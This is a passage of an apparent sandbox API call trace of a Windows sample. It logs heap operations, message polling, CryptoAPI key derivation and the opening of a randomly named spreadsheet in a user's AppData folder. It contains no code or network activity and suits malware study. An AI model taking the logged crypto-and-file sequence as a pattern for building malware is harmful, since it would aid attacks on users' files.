lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0242.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0242.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51520 [0242.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51520, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0242.002] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0242.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0242.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0242.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0242.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0242.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0242.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.004] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0242.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0242.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0242.004] CryptDestroyHash (hHash=0xa873d0) returned 1 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0242.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0242.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0242.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0242.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0242.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0242.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0242.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0242.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0242.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0242.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0242.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0242.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0242.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0242.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0242.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0242.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0242.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0242.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0242.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0242.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0242.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZTd7YZt.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ztd7yzt.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0242.072] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.072] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0242.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0242.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0242.073] PeekMessageW (in: 